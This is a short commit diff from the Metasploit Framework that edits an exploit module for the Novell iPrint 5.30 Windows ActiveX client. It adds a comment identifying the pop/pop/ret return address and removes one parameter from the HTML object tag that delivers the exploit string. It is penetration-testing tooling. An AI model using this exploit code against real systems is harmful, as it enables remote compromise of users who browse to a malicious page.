removed unecessary parameter, commented target
git-svn-id: file:///home/svn/framework3/trunk@8338 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
edc64f824e
commit
c073cd707a
|
@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ]
|
||||
[ 'iPrint 5.30 Windows Client', { 'Ret' => 0x100489ac } ] # p/p/r in ienipp.ocx v5.30
|
||||
],
|
||||
'DisclosureDate' => 'Dec 08 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
@ -114,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
content = %Q|<html>
|
||||
<object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'>
|
||||
<param name='operation' value='#{operation}' />
|
||||
<param name='result-type' value='test' />
|
||||
<param name='target-frame' value='#{sploit}' />
|
||||
</object>
|
||||
</html>
|
||||
|
|
Loading…
Reference in New Issue